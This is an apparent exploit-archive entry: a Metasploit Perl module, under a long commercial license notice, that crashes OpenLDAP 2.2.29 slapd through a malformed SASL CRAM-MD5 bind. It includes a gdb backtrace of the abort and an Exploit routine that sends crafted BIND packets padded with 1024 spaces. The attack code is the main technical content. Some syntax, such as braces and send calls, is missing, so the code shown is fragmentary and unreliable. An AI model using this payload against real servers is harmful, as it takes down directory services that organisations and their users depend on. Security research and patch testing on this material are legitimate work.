OpenLDAP 2.2.29 - Remote Denial of Service (Metasploit)









# The exploit is a part of VulnDisco Pack - use only under the license agreement
# specified in LICENSE.txt in your VulnDisco distribution


# Purchaser buys VulnDisco Pack ("the Pack") and receives the right to use it under the terms of the following License.

# The Pack with all the data and software contained in it is the private property of GLEG ltd. Company ("the Company"). The Company is the only entity who has exclusive rights to the Pack. The Pack with all the software and data containing in it is the intellectual property of the Company and is guarded by intellectual property laws.

# Purchaser has the rights to use the Pack only under the terms and conditions of this License to the maximum extent permitted by applicable law.
# Purchaser has the rights to use the Pack only for his own needs or for the needs of his company if the License is purchased by the company. For the means of this License by purchaser's company those people are meant who directly works for the company which owns the License.
# Purchaser is granted nonexclusive, non-transferable rights to use the Pack.

# Purchaser is allowed to install the Pack on unlimited number of seats.

# Purchaser is not restricted to use the Pack to test the particular IP range.

# Purchaser is not allowed to disclose the Pack in whole or partly, to disclose any information concerning the Pack or any information derived from the Pack. Purchaser is not allowed to transfer the Pack or any data concerning it (including derived data), anyhow or by any means to third party entities. Purchaser is not allowed to sell or redistribute or otherwise transfer the rights to the Pack unless otherwise is expressly stated in writing by the Company.

# Purchaser realizes that the Pack is provided as-is without warranty of any kind, including warranties that the Pack suits particular needs, is safe to use, or contain no issues. 

# Purchaser realizes that the Pack contains potentially dangerous information which being improper used or misused can cause damage to Purchaser or to Purchaser's company or to third party organizations and individuals. 

# The Company is not responsible for any losses to purchaser or to purchaser's company resulted from Purchaser's proper or improper use or inability to use the Pack, including but not limited to loss of information, damages to computers or to network infrastructure. The Company is not responsible for any losses to any third party organizations or individuals resulted from Purchaser's intentional or accidental use or misuse of the Pack. The Company is not responsible for any consequences of Purchaser's disclosure of the Pack. 

# Purchaser realizes that he is solely responsible for any claims resulted from Purchaser's acquisition, use or misuse of the Pack and agrees to defend Company from mentioned claims at own cost. 

# Purchaser agrees to take all necessary measures to not allow disclosure of the Pack, to use it only under the terms of this License and applicable law. Purchaser has been informed and agrees that in case of Purchaser.s breach of any provisions of this License the Company has right to take appropriate measures including legal prosecution.

# All information that is provided for Purchaser by the Company, including Pack updates and support information, is provided under the same terms as in the Pack License. As for newer versions of the Pack, the Company reserves the right to issue new License with them.

# This License is designed in accordance with the laws of Russian Federation.
# License terms are governed by the laws of Russian Federation. Unless otherwise is agreed in writing, all disputes relating to this License shall be subject to final and binding arbitration in Russia, Moscow.

# Purchaser has been informed and agrees that after installation of the Pack this Agreement is considered as signed and came into force as Agreement between the Company and Purchaser.

# Purchaser has read and understood this License, and agrees to its terms and conditions.

use strict;

package Msf::Exploit::vd_openldap;
use base "Msf::Exploit";
use Pex::Text;

my $advanced = { };

my $info = 
	"Name"      => "[0day] OpenLDAP DoS",
    	"Version"   => "\$Revision: 1.0 \$",
    	"Authors"   => ["Evgeny Legerov"],
    	"Arch"      => ["x86"],
    	"OS"        => ["linux"],
    	"Priv"      => 1,
    	"UserOpts"  =>
                	"RHOST" => [1, "ADDR", "The target address"],
                    	"RPORT" => [1, "PORT", "The target port", 389]

    	"Description" => Pex::Text::Freeform(q{
This is a Denial of Service exploit.
Debug session:
Program received signal SIGABRT, Aborted.
[Switching to Thread -1375056976 (LWP 13500)]
0xaeb747e2 in _dl_sysinfo_int80 () from /lib/
(gdb) bt
#0  0xaeb747e2 in _dl_sysinfo_int80 () from /lib/
#1  0xae7c71f8 in raise () from /lib/
#2  0xae7c8948 in abort () from /lib/
#3  0xae7c038e in __assert_fail () from /lib/
#4  0x125d09b1 in ldap_dn2bv_x () from /usr/sbin/slapd
#5  0x12539596 in slap_sasl_getdn () from /usr/sbin/slapd
#6  0x12539c95 in slap_sasl_getdn () from /usr/sbin/slapd
#7  0xaea88987 in _sasl_canon_user () from /usr/lib/
#8  0xae5da94d in crammd5_client_plug_init () from /usr/lib/sasl2/
#9  0xaea9183b in sasl_server_step () from /usr/lib/
#10 0x12538785 in slap_sasl_bind () from /usr/sbin/slapd
#11 0x12516ecf in do_bind () from /usr/sbin/slapd
#12 0x124feac0 in connection_read () from /usr/sbin/slapd
#13 0x125bfa24 in ldap_int_thread_pool_shutdown () from /usr/sbin/slapd
#14 0xae8dab80 in start_thread () from /lib/
#15 0xae869dee in clone () from /lib/


  	"DefaultTarget"  => 0,
        "Targets"        =>
                        ["openldap-2.2.29-1.FC4.i386.rpm / Fedora Core 4"],

        "Keys"           => ["vd_openldap"],

sub new	{
	my $class = shift;
	return $class->SUPER::new({"Info" => $info, "Advanced" => $advanced}, @_);

sub Exploit {
	my $self = shift;
        my $host = $self->GetVar("RHOST");
        my $port = $self->GetVar("RPORT");

      	my $sock = Msf::Socket::Tcp->new("PeerAddr" => $host, "PeerPort"  => $port);
        if ($sock->IsError) {
                $self->PrintLine("Error creating socket: " . $sock->GetError);

	$self->PrintLine("Sending LDAP BIND request...");

	my $s="\x30\x17\x02\x02\x04\xe7\x60\x11\x02\x01\x03\x04\x00\xa3\x0a\x04";
 	$s .= "\x08\x43\x52\x41\x4d\x2d\x4d\x44\x35";
	$sock->Recv(-1, 10);

	$s  = "\x30\x82\x04\x1f\x02\x02\x04\xe6\x60\x82\x04\x17\x02\x01\x03\x04";
        $s .= "\x00\xa3\x82\x04\x0e\x04\x08\x43\x52\x41\x4d\x2d\x4d\x44\x35\x04";
        $s .= "\x82\x04\x00";
	$s .= "\x20" x 1024;

	$self->PrintLine("Sending second LDAP BIND request...");




# [2006-11-06]